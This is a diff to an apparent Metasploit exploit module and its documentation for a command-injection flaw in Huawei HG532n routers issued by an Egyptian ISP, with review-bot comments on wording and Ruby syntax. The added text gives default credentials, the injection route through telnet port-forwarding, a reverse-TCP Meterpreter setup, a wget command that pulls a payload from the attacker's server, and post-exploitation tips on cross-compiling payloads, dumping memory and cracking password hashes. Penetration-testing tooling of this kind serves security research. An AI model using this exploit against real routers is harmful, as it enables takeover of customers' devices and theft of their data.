diff --git a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
index 5080c34141..48209d7a72 100644
--- a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
+++ b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
@@ -3,7 +3,7 @@
## Introduction
The Huawei HG532n routers, shipped by TE-Data Egypt, are vulnerable to a command
-injection exploit in the ping field of their limited shell interface.
+injection exploit in the hidden ping command of their limited shell interface.
Affected hardware/software version strings:
@@ -16,9 +16,28 @@ Affected hardware/software version strings:
Software Version: V100R001C105B016 TEDATA
```
+TE-Data, the incumbent ISP operator in Egypt, provided this router to customers
+by default. The web interface has two kinds of logins, a "limited" user:user login
+given to all customers, and an admin mode used by company's technical staff. For
+hosts within the ISP network, this web interface is remotely accessible.
+
+The web interface's user mode provides very limited functionality – only WIFI
+passwords change and NAT port-forwarding. Nonetheless by port forwarding the
+router's own (filtered) telnet port, it becomes remotely accessible. All installed
+routers have a telnet password of admin:admin.
+
+Due to the ISP's _encrypted_ runtime router configuration [*] though, the telnet
+daemon does not provide a direct linux shell. Rather a very limited custom shell
+is provided instead: "ATP command line tool". The limited shell has a ping command
+which falls back to the system shell though (`ping %s > /var/res_ping`). We exploit
+that through command injection to gain Meterpreter root access.
+
+[*] `` at `/etc/defaultcfg.xml`
## Usage
+With an attacker node that resides within the ISP network, do:
+
- Set `payload` to `linux/mipsbe/mettle_reverse_tcp`
- Set `RHOST` to the target router's IP
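Review bot: the footnote line `[*] ... at /etc/defaultcfg.xml` has an empty code span before "at", so the reader never learns which configuration element the encrypted-config remark refers to; either name the element inside the backticks or drop the footnote and fold the path into the sentence ("Due to the ISP's encrypted runtime configuration at `/etc/defaultcfg.xml`"). The footnote also needs a blank line before `## Usage` so it does not render as part of the heading block. Two wording nits in the same hunk: "used by company's technical staff" should be "used by the company's technical staff", and "only WIFI passwords change and NAT port-forwarding" should be "only changing the WiFi password and NAT port-forwarding".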
@@ -68,7 +87,7 @@ and `DOWNFIILE` to the payload's path on that server. Run the exploit
afterwards.
-## Live Scenario
+## Live Scenario (Verbose)
```
$ msfconsole
@@ -156,3 +175,78 @@ Architecture : mips
Meterpreter : mipsbe/linux
meterpreter >
```
+
+## Post-exploitation
+
+### MIPS toolchain
+
+Beside a basic meterpreter shell, you can compile your own C programs and
+run them on the device! Download the [Sourcery CodeBench Lite](https://sourcery.mentor.com/GNUToolchain/package13838/public/mips-linux-gnu/mips-2016.05-8-mips-linux-gnu-i686-pc-linux-gnu.tar.bz2)
+MIPS toolchain then compile your programs in the following manner:
+
+
+```
+#!/bin/bash
+
+TOOLCHAIN_ROOT=mips-2016.05
+CROSS_COMPILE=$TOOLCHAIN_ROOT/bin/mips-linux-gnu-
+
+${CROSS_COMPILE}gcc \
+ --sysroot=${TOOLCHAIN_ROOT}/mips-linux-gnu/libc/uclibc/ \
+ -Wl,-dynamic-linker,/lib/ld-uClibc.so.0 \
+ -static \
+ program.c
+
+${CROSS_COMPILE}strip -s a.out -o payload
+```
+
+Then call `wget` to download and run the generated `payload` above. Be careful
+of the device's own wget call conventions below.
+
+### A special wget command
+
+Huawei crafted their own `wget` implementation inside the shipped version of
+busybox. It has the following syntax:
+
+
+```
+meterpreter > shell
+Process 17951 created.
+Channel 1 created.
+wget -h
+wget: invalid option -- h
+BusyBox vv1.9.1 (2012-10-16 22:24:47 CST) multi-call binary
+
+Usage: wget [OPTION]... HOST
+
+wget download and upload a file via HTTP
+
+Options:
+ -g Download
+ -s Upload
+ -v Verbose
+ -u Username to be used
+ -p Password to be used
+ -l Local file path
+ -r Remote file path
+ -P Port to be used, optional
+ -B Bind local ip, optional
+ -A Remote resolved ip, optional
+ -b Transfer start position
+ -e Transfer length
+ -m Max transfer size
+ -c Compress downloaded file
+```
+
+### Rootfs image
+
+Extract `/dev/mtdblock[0123]` images from the device to gain full raw access to
+the flash. Use [binwalk](https://github.com/devttys0/binwalk) on the extracted
+`/dev/mtdblock3` contents to get a full squashfs rootfs image.
+
+The most important files in the rootfs image are encrypted though. Nonetheless,
+by dumping `/dev/mem` contents and looking for the juicy bits, you will find
+all the necessary information needed ;-)
+
+Note that even after configuration decryption, all the now-plaintext important
+configuration files store passwords in a SHA-256 hashed form. Be creative.
diff --git a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
index a42a1f8208..b180ffc16d 100644
--- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
+++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb
@@ -17,35 +17,22 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(
info,
'Name' => 'Huawei HG532n Command Injection',
- 'Description' => %q{
+ 'Description' => %q(
+ This module exploits a command injection vulnerability in the Huawei
+ HG532n routers provided by TE-Data Egypt, leading to a root shell.
- The Huawei HG532n routers are vulnerable to a command injection exploit
- in the ping field of their limited shell interface.
+ The router's web interface has two kinds of logins, a "limited" user:user
+ login given to all customers and an admin mode. The limited mode is used
+ here to expose the router's telnet port to the outside world through NAT
+ port-forwarding.
- TE-Data, the incumbent ISP operator in Egypt, provides this router to
- customers by default. The web interface has two kinds of logins, a
- "limited" user:user login given to all customers, and an admin mode used
- by company's technical staff. From machines within the TE-Data network,
- this web interface is remotely accessible.
-
- The web interface's user mode provides very limited functionality, only
- WIFI passwords change and NAT port-forwarding. Nonetheless by port
- forwarding the router's own (filtered) telnet port, it becomes remotely
- accessible. All installed routers have a telnet password of admin:admin.
-
- Due to the ISP's (encrypted) runtime router configuration [*] though,
- the telnet daemon does not provide a direct linux shell. Rather a very
- limited custom shell is provided instead: "ATP command line tool". The
- limited shell has a ping command which falls back to the system shell
- though ("ping %s > /var/res_ping"). We exploit that through command
- injection to gain Meterpreter root access.
-
- [*]
- at encrypted, read-only, /etc/defaultcfg.xml.
- },
+ With telnet now remotely accessible, the router's limited "ATP command
+ line tool" (served over telnet) can be upgraded to a root shell through
+ an injection into the ATP's hidden "ping" command.
+ ),
'Author' =>
[
- 'Ahmed S. Darwish ', # Vulnerability discovery + msf module
+ 'Ahmed S. Darwish ', # Vulnerability discovery, msf module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
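Review bot: the Description literal changed from `%q{ ... }` to `%q( ... )`, which is inconsistent with the `%q{` form used throughout modules/ and is fragile: Ruby accepts it here only because the "(served over telnet)" parenthetical inside the text is balanced, so a later edit that adds an unbalanced parenthesis turns into a syntax error. Keep `%q{`. The description content itself reads well and correctly defers the ISP and credential details to the documentation file; the author comment change from "+ msf module" to ", msf module" is fine.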
@@ -480,16 +467,7 @@ class MetasploitModule < Msf::Exploit::Remote
srv_port = datastore['SRVPORT'].to_s
output_file = "/tmp/#{rand_text_alpha_lower(8)}"
- # Custom Huawei busybox (v1.9) wget
- #
- # Options:
- # -g Download
- # -s Upload
- # -v Verbose
- # -l Local file path
- # -r Remote file path
- # -P Port to be used, optional
- #
+ # Check module documentation for the special wget syntax
wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"
execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.
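Review bot: replacing the option table with "Check module documentation for the special wget syntax" removes the only in-code explanation of the non-standard busybox flags, so a reader of the `wget_cmd` line can no longer tell that `-l` is the local path and `-r` the remote one without opening the .md file; keep a one-line summary beside the pointer, e.g. `# Huawei busybox wget: -g download, -l local path, -r remote path, -P port`. Minor: `-P#{srv_port}` is attached while the other options are space-separated (`-P #{srv_port}` reads consistently), and the trailing comment mixes a backtick with a straight quote in `` `404 error' ``.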